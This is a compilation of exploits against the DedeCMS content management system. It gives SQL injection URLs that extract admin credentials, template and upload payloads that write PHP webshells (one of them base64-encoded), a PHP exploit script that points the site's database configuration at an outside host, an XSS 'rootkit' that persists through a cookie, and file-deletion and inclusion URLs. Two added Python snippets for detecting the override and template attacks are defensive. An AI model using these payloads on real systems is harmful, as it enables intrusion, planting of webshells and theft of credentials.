DedeCMS 5.6 rss.php injection vulnerability
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
DedeCMS v5.6 embedded malicious code execution vulnerability
Register as a member and upload a piece of software:
In the "local address" field enter a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}; after publishing, viewing or editing the entry executes it. The file-writing variant:
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
This generates x.php with password xiao, a one-line webshell written directly.
DedeCMS 5.6 GBK SQL injection vulnerability
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe''")/>
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7''"><******%20src=http://www.test.com/
DedeCMS V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
DedeCMS (all versions) gotopage variable XSS vulnerability
1. Copy and paste the URL below and open it to trigger the XSS and install the XSS rootkit. Note that IE8/9 and similar browsers block URL-based XSS, so the XSS filter has to be turned off.
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
2. Close the browser; whichever of the URLs below is then visited, our XSS fires.
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
http://v57.demo.dedecms.com/dede/login.php
DedeCMS (织梦) variable override getshell
#!/usr/bin/php -w
<?php
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author: www.heixiaozi.com www.webvul.com
');
echo "\r\n";
if($argv[2]==null){
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
Example:
php '.$argv[0].' www.site.com 1 old
+---------------------------------------------------------------------------+
');
exit;
}
$url=$argv[1];
$aid=$argv[2];
$path=$argv[3];
$exp=Getshell($url,$aid,$path);
if (strpos($exp,"OK")>12){
echo "[*] Exploit Success \n";
if($aid==1)echo "[*] Shell:".$url."/$path/data/cache/fuck.php\n" ;
if($aid==2)echo "[*] Shell:".$url."/$path/fuck.php\n" ;
if($aid==3)echo "[*] Shell:".$url."/$path/plus/fuck.php\n";
}else{
echo "[*] Exploit Failed \n";
}
function Getshell($url,$aid,$path){
$id=$aid;
$host=$url;
$port="80";
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
$data .= "Host: ".$host."\r\n";
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
//$data .= "Accept-Encoding: gzip,deflate\r\n";
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
$data .= "Connection: keep-alive\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
$data .= $content."\r\n";
$ock=fsockopen($host,$port);
if (!$ock) {
echo "[*] No response from ".$host."\n";
}
fwrite($ock,$data);
while (!feof($ock)) {
$exp=fgets($ock, 1024);
return $exp;
}
}
?>
DedeCMS (织梦) v5.6-5.7 unauthorized access vulnerability (direct entry to the admin backend)
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
Replace validate=dcug above with the current captcha value to enter the site backend directly.
The precondition for this vulnerability is that the backend path must be known.
DedeCMS (织梦) tag remote file write vulnerability
Precondition: you must set up your own dede database and insert the following row:
insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');
Then submit with the form below; the shell is 1.php in the same directory.
Work out the principle yourself...
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
<script>
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>
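The PHP script, the login URL and the mytag_js.php form above all rely on the same marker: a PHP superglobal name followed by [GLOBALS] in the query string, Cookie header or body, so that the request import overwrites $GLOBALS['cfg_*']. The following is an added detection example, not code from the original write-up or from DedeCMS; it decodes each request component and flags that marker and the cfg_* keys it targets. The sample requests are constructed, and attacker-db.example / site.example are placeholder hosts.

```python
import re
from urllib.parse import unquote_plus

# Marker of the variable-override technique: a PHP superglobal name followed
# by [GLOBALS], sent via GET, POST or Cookie so that the request import
# overwrites $GLOBALS['cfg_*'] (database host, table prefix, ...).
OVERRIDE_RE = re.compile(
    r"_(?:GET|POST|COOKIE|REQUEST|SESSION|FILES)\s*\[\s*GLOBALS\s*\]", re.IGNORECASE
)
# Configuration keys a client must never supply; these are the ones abused on this page.
CFG_KEY_RE = re.compile(
    r"\bcfg_(?:dbhost|dbuser|dbpwd|dbname|dbprefix|basedir|imgtype|softtype"
    r"|mediatype|not_allowall)\b",
    re.IGNORECASE,
)

def inspect_part(part: str) -> list:
    """URL-decode one request component (query string, Cookie header or body)
    and return the override indicators found in it."""
    decoded = unquote_plus(part)
    findings = []
    if OVERRIDE_RE.search(decoded):
        findings.append("superglobal[GLOBALS] override")
    for key in sorted({m.lower() for m in CFG_KEY_RE.findall(decoded)}):
        findings.append("client-supplied " + key)
    return findings

def inspect_request(path: str, cookie: str = "", body: str = "") -> dict:
    """Return {component: [indicators]} for each matching component;
    an empty dict means none of the patterns appeared."""
    hits = {}
    for name, part in (("path", path), ("cookie", cookie), ("body", body)):
        found = inspect_part(part)
        if found:
            hits[name] = found
    return hits

# Constructed samples modelled on the requests in this write-up (not real
# traffic; attacker-db.example and site.example are placeholders).
SAMPLES = {
    "mytag_js_post": dict(
        path="/plus/mytag_js.php?aid=1",
        body="doaction=http%3A%2F%2Fsite.example%2Fplus%2Fmytag_js.php%3Faid%3D1"
        "&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=attacker-db.example"
        "&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true",
    ),
    "login_get": dict(
        path="/dede/login.php?dopost=login&userid=admin&pwd=x"
        "&_POST[GLOBALS][cfg_dbhost]=attacker-db.example",
    ),
    "benign": dict(path="/plus/list.php?tid=10&pageno=2", cookie="PHPSESSID=abc123"),
}
```

Run inspect_request(**SAMPLES["mytag_js_post"]) to see the body flagged while the benign list.php request returns an empty dict.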
DedeCMS <= V5.6 Final template execution vulnerability
1. Upload a template file:
Register a user, enter the member backend, publish an article and upload an image; then, in attachment management, replace the image with our crafted template. For example, the image name is:
uploads/userup/2/12OMX04-15A.jpg
The template content is (if image formats are restricted, prefix it with gif89a):
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}
2. Edit the article just published, view the page source, and build a form:
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data" onsubmit="return checkSubmit();">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1275972263" />
<div id="mainCp">
<h3 class="meTitle"><strong>修改文章</strong></h3>
<div class="postForm">
<label>标题:</label>
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
<label>标签TAG:</label>
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
<label>作者:</label>
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
<label>隶属栏目:</label>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>测试栏目</option>
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
<label>我的分类:</label>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>hahahha</option>
</select>
<label>信息摘要:</label>
<textarea name="description" id="description">1111111</textarea>
(内容的简要说明)
<label>缩略图:</label>
<input name="litpic" type="file" id="litpic" onchange="SeePicNew('divpicview',this);" maxlength="100" class="intxt"/>
<input type='text' name='templet' value="../uploads/userup/2/12OMX04-15A.jpg">
<input type='text' name='dede_addonfields' value="templet,htmltext;">(crafted here)
</div>
<!-- 表单操作区域 -->
<h3 class="meTitle">详细内容</h3>
<div class="contentShow postForm">
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
<label>验证码:</label>
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
<img src="http://127.0.0.1/dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" onclick="this.src=this.src+'?'" />
<button class="button2" type="submit">提交</button>
<button class="button2 ml10" type="reset" onclick="location.reload();">重置</button>
</div>
</div>
</form>
Submit; if it reports the edit succeeded, we have successfully changed the template path.
3. Visit the edited article:
Assuming the aid of the article just edited is 2, we only need to visit:
http://127.0.0.1/dede/plus/view.php?aid=2
and the webshell 1.php is generated in the plus directory.
DedeCMS site management system Get Shell vulnerability (5.3/5.6)
Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}
Save as 1.gif
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /><br />
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit" >更改</button>
</form>
Build the form above; after uploading, the image is saved as /uploads/userup/3/1.gif
Publish an article, then build the edit form as follows:
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1282049150" />
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test</option>
</select>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>aa</option></select>
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<input type='hidden' name='dede_addonfields' value="templet">
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
<button class="button2" type="submit">提交</button>
</form>
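The template tricks in this section and the preceding one (an image header glued in front of a tag with runphp='yes', or a {dede:php} block like the one inserted into dede_mytag earlier) can be caught by scanning what lands in the upload directory or in template-bearing table rows. This is an added example, not code from the original page or from DedeCMS; the sample files are constructed.

```python
import re

# Template-tag forms used in this write-up to get code execution from an
# uploaded "image": {dede:php}...{/dede:php} and any {dede:xxx ... runphp='yes'} tag.
DEDE_TAG_RE = re.compile(r"\{dede:(\w+)([^}]*)\}", re.IGNORECASE)
RUNPHP_RE = re.compile(r"runphp\s*=\s*['\"]?\s*yes", re.IGNORECASE)

def scan_upload(data: bytes) -> dict:
    """Inspect one attachment (or one dede_mytag normbody row) and report the
    tags that would make the template engine run PHP, plus whether an image
    header has merely been glued in front of them."""
    text = data.decode("latin-1")  # 1:1 byte mapping; the tags are ASCII
    dangerous = []
    for m in DEDE_TAG_RE.finditer(text):
        name, attrs = m.group(1).lower(), m.group(2)
        if name == "php" or RUNPHP_RE.search(attrs):
            dangerous.append(name)
    head = data[:8]
    looks_like_image = (
        head.upper().startswith((b"GIF87A", b"GIF89A"))
        or head.startswith(b"\xff\xd8\xff")
        or head.startswith(b"\x89PNG")
    )
    return {
        "dangerous_tags": dangerous,
        # a genuine image never carries template tags; a header plus tags is a disguise
        "fake_image": looks_like_image and bool(dangerous),
        "block": bool(dangerous),
    }

# Constructed samples modelled on the payloads in this write-up.
SAMPLE_GIF_TEMPLATE = (
    b"Gif89a{dede:field name='toby57' runphp='yes'}\nphpinfo();\n{/dede:field}"
)
SAMPLE_PHP_TAG = b"{dede:php}$fp = @fopen('1.php', 'a');{/dede:php}"
SAMPLE_BENIGN_TEMPLATE = b"{dede:field name='title'/} {dede:arclist row='5'}{/dede:arclist}"
SAMPLE_REAL_GIF = b"GIF89a\x01\x00\x01\x00\x80\x00\x00\xff\xff\xff\x00\x00\x00!\xf9\x04;"
```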
DedeCMS (织梦) V5.6 remote file deletion vulnerability
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
DedeCMS (织梦) V5.6 plus/carbuyaction.php local file inclusion vulnerability
http://www.test.com/plus/carbuyaction.php?dopost=return&code=../../
DedeCMS V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
The password is the 32-character MD5 with the first 5 and the last 7 characters removed, giving a 20-character MD5; then remove 3 from the front and 1 from the end to get the 16-character MD5.
DedeCMS (织梦) v5.6 two cross-site scripting vulnerabilities
/plus/search.php?keyword=zhuba&searchtype=titlekeyword&channeltype=0&orderby=&kwtype=1&pagesize=10&typeid=0&TotalResult=%3Ciframe%20src=http://www.test.net%3E&PageNo=2
http://www.test.com/member/login.php?gourl=%22%3E%3Ciframe%20src=http://www.test.net%3E
DedeCMS (织梦) 5.1 feedback_js.php injection vulnerability
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
DedeCMS (织梦) select_soft_post.php page uninitialized variable vulnerability
<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='确定' />
</form>
<br />It's just an exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game, get a webshell at /data/cache/fly.php...<br />
</body>
</html>
DedeCMS (织梦) 5.1 plus/feedback_js.php injection vulnerability
To close the quotes I used union twice:
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
DedeCMS 5.1 SQL Injection
######################### Securitylab.ir ########################
# Application Info:
# Name: DEDECMS
# Version: 5.1
#################################################################
# Discovered By: Securitylab.ir
# Website: http://securitylab.ir
# Contacts: admin[at]securitylab.ir & info@securitylab[dot]ir
#################################################################
# Vulnerability Info:
# Type: Sql Injection Vulnerability
# Risk: Medium
#===========================================================
# feedback_js.php
$urlindex = 0;
if(empty($arcID))
{
$row = $dlist->dsql->GetOne("Select id From `#@__cache_feedbackurl` where url='$arcurl' ");
if(is_array($row)) $urlindex = $row['id'];
}
if(empty($arcID) && empty($urlindex)) exit();
......
if(empty($arcID)) $wq = " urlindex = '$urlindex' ";
else $wq = " aid='$arcID' ";
$querystring = "select * from `#@__feedback` where $wq and ischeck='1' order by dtime desc";
$dlist->Init();
$dlist->SetSource($querystring);
...
# http://site.com/[PATH]/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''=
#===========================================================
#################################################################
# Securitylab Security Research Team
###################################################################
DedeCMS (织梦) V5.5 pagination handling function information disclosure vulnerability
http://www.dedecms.com/plus/list.php?tid=10&pageno=0
http://www.dedecms.com/plus/list.php?tid=10&pageno='
http://www.dedecms.com/plus/list.php?tid=10&pageno=-1
DedeCMS (织梦) 5.3 - 5.5 plus/digg_frame.php injection vulnerability
It exploits a MySQL numeric field overflow that raises an error, combined with DedeCMS recording database error messages into a PHP file whose header is not validated.
1. Visit the URL:
http://www.abc.com/plus/digg_frame.php?action=good&id=1024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
The error message is shown.
2. Visit http://www.abc.com/data/mysql_error_trace.php; seeing the following information proves the injection succeeded.
int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
3. Run the file test.html from dede.rar; note that the action address in the form is
<form action="http://www.abc.com/data/mysql_error_trace.php" enctype="application/x-www-form-urlencoded" method="post">
After clicking OK, seeing the information from step 2 means the trojan file was uploaded successfully.
DedeCMS (织梦) plus/infosearch.php file injection vulnerability
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
DedeCMS cross-site scripting and absolute path disclosure vulnerability
Submit http://127.0.0.1/dc/include/jump.php?gurl=http://00day.cn and it redirects to http://00day.cn
Beginners will think this is how the XSS is exploited, but it is not; we can try to close the tag instead. But PHP has the gpc restriction, so how do we bypass it?
Submit: http://127.0.0.1/dc/include/jump.php?gurl=%23"</script><script>alert(/00day.cn/)</script>/*
Multiple Cross-Site Scripting Vulnerabilities in DedeCms v5.x
# .: Multiple Cross-Site Scripting Vulnerabilities in DedeCms v5.x
# .: [Author] Depo2 - TpTLabs.com
# .: [Affected versions] http://www.dedecms.com/ - DedeCms v5.x
# .: [Credit] The disclosure of these issues has been credited to Depo2
# .: [Classification]
# Attack Type: Input Manipulation
# Impact: Loss of Integrity
# Fix: N/A
# Public release: 26-08-2008 (Sun)
# Class Input Validation Error
# Original Advisory http://depo2.nm.ru/DedeCmsv5.x_XSS.txt
# Other Advisory http://www.xssing.com/index.php?x=3&y=53
- XSS -
[DedeCms WebSite]/dede/catalog_tree.php?f=form1&opall=1&v=typeid&bt=[XSS]
[DedeCms WebSite]/dede/catalog_tree.php?f=form1&opall=1&v=[XSS]
[DedeCms WebSite]/dede/catalog_tree.php?f=[XSS]
[DedeCms WebSite]/dede/content_list.php?arcrank=[XSS]
[DedeCms WebSite]/dede/content_list.php?dopost=listArchives&nowpage=1&totalresult=0&arcrank=[XSS]&cid=[XSS/SQL]&keyword=[XSS]+&orderby=[XSS/SQL]&imageField=%CB%D1%CB%F7
[DedeCms WebSite]/dede/content_list.php?channelid=[XSS]&cid=0&adminid=[XSS]
[DedeCms WebSite]/include/dialog/select_images.php?f=form1.picname&imgstick=[XSS]
[DedeCms WebSite]/include/dialog/select_images.php?f=[XSS]
[DedeCms WebSite]/dede/login.php?gotopage=[XSS]
[DedeCms WebSite]/dede/article_keywords_select.php?f=[XSS]
[DedeCms WebSite]/dede/file_pic_view.php?activepath=[XSS]
[DedeCms WebSite]/member/login.php?gourl=[XSS]
[DedeCms WebSite]/dede/pic_view.php?activepath=[XSS]
- PHP Path Disclosure -
[DedeCms WebSite]/include/dialog/
- XSRF -
[DedeCms WebSite]/dede/sys_info.php has XSRF
edit___cfg_beian, edit___cfg_keywords etc. parameters are not checked for evil code
if an attacker writes an "end of textarea" </textarea> tag, that gives an XSS alert :)
[XSS Code] :</script>'"><script>alert(document.cookie)</script>
DedeCMS (织梦) 2007 group/search.php injection vulnerability
http://127.0.0.1/dg/group/search.php?sad=g&keyword=%cf'